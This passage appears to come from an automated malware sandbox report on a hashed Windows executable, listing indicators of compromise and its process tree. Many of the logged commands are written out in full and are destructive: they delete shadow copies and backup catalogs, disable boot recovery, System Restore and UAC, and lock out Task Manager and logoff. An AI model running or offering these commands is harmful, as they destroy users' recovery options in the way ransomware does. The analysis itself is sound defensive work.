2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeBackupPrivilege	1632	vssvc.exe
Token: SeRestorePrivilege	1632	vssvc.exe
Token: SeAuditPrivilege	1632	vssvc.exe
Token: SeBackupPrivilege	692	wbengine.exe
Token: SeRestorePrivilege	692	wbengine.exe
Token: SeSecurityPrivilege	692	wbengine.exe
Token: SeAuditPrivilege	4860	svchost.exe
Token: SeAuditPrivilege	4860	svchost.exe
Token: SeAuditPrivilege	4860	svchost.exe
Token: SeAuditPrivilege	4860	svchost.exe
Token: SeAuditPrivilege	4860	svchost.exe
Token: SeAuditPrivilege	4860	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2324 wrote to memory of 2680	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	83
PID 2324 wrote to memory of 2680	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	83
PID 2324 wrote to memory of 2680	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	83
PID 2324 wrote to memory of 3800	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	84
PID 2324 wrote to memory of 3800	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	84
PID 2324 wrote to memory of 3800	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	84
PID 2324 wrote to memory of 4884	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	86
PID 2324 wrote to memory of 4884	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	86
PID 2324 wrote to memory of 1384	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	85
PID 2324 wrote to memory of 1384	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	85
PID 2324 wrote to memory of 924	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	89
PID 2324 wrote to memory of 924	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	89
PID 2324 wrote to memory of 1988	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	90
PID 2324 wrote to memory of 1988	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	90
PID 2324 wrote to memory of 4740	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	93
PID 2324 wrote to memory of 4740	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	93
PID 2324 wrote to memory of 4400	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	99
PID 2324 wrote to memory of 4400	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	99
PID 2324 wrote to memory of 3764	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	96
PID 2324 wrote to memory of 3764	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	96
PID 2324 wrote to memory of 2256	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	97
PID 2324 wrote to memory of 2256	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	97
PID 2324 wrote to memory of 1068	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	100
PID 2324 wrote to memory of 1068	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	100
PID 2324 wrote to memory of 1152	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	101
PID 2324 wrote to memory of 1152	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	101
PID 2324 wrote to memory of 4216	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	104
PID 2324 wrote to memory of 4216	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	104
PID 2324 wrote to memory of 2412	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	110
PID 2324 wrote to memory of 2412	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	110
PID 1384 wrote to memory of 4948	1384	cmd.exe	103
PID 1384 wrote to memory of 4948	1384	cmd.exe	103
PID 4884 wrote to memory of 3532	4884	cmd.exe	105
PID 4884 wrote to memory of 3532	4884	cmd.exe	105
PID 924 wrote to memory of 3696	924	cmd.exe	108
PID 924 wrote to memory of 3696	924	cmd.exe	108
PID 1988 wrote to memory of 2152	1988	cmd.exe	111
PID 1988 wrote to memory of 2152	1988	cmd.exe	111
PID 2324 wrote to memory of 2476	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	122
PID 2324 wrote to memory of 2476	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	122
PID 4740 wrote to memory of 5048	4740	cmd.exe	121
PID 4740 wrote to memory of 5048	4740	cmd.exe	121
PID 2324 wrote to memory of 4552	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	120
PID 2324 wrote to memory of 4552	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	120
PID 2324 wrote to memory of 1020	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	118
PID 2324 wrote to memory of 1020	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	118
PID 4400 wrote to memory of 1876	4400	cmd.exe	112
PID 4400 wrote to memory of 1876	4400	cmd.exe	112
PID 2324 wrote to memory of 1968	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	115
PID 2324 wrote to memory of 1968	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	115
PID 2324 wrote to memory of 4444	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	114
PID 2324 wrote to memory of 4444	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	114
PID 2324 wrote to memory of 3504	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	125
PID 2324 wrote to memory of 3504	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	125
PID 2324 wrote to memory of 1092	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	127
PID 2324 wrote to memory of 1092	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	127
PID 2324 wrote to memory of 2768	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	131
PID 2324 wrote to memory of 2768	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	131
PID 1152 wrote to memory of 3644	1152	cmd.exe	133
PID 1152 wrote to memory of 3644	1152	cmd.exe	133
PID 2324 wrote to memory of 3196	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	130
PID 2324 wrote to memory of 3196	2324	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe	130
PID 4216 wrote to memory of 3836	4216	cmd.exe	132
PID 4216 wrote to memory of 3836	4216	cmd.exe	132

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4920	attrib.exe
3960	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
"C:\Users\Admin\AppData\Local\Temp\b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:2680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:3800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4948
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3696
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  2⤵
  PID:3764
- - C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    3⤵
    - Deletes NTFS Change Journal
    PID:2924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  2⤵
  PID:2256
- - C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:4500
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
  2⤵
  PID:1068
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    3⤵
    PID:3644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:2412
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2932
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:4444
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:1848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:1968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1020
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2680
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  2⤵
  PID:4552
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:2476
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:2852
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:3504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
  2⤵
  PID:3504
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:1092
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:4828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:3196
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:2768
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
  2⤵
  PID:60
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1912
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:4624
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:2224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:2876
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:4816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:3468
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
  2⤵
  PID:2760
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:4700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:2624
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:3960
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:2020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
  2⤵
  PID:3356
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5832
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:3556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:4564
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:5152
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:2916
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:5200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
  2⤵
  PID:4724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:4720
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5144
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:2928
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:1348
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
  2⤵
  PID:3384
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:6072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
  2⤵
  PID:1848
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:220
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:60
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:1284
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:5200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
  2⤵
  PID:4456
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:4072
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:4852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4396
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:4288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
  2⤵
  PID:5236
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:5244
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
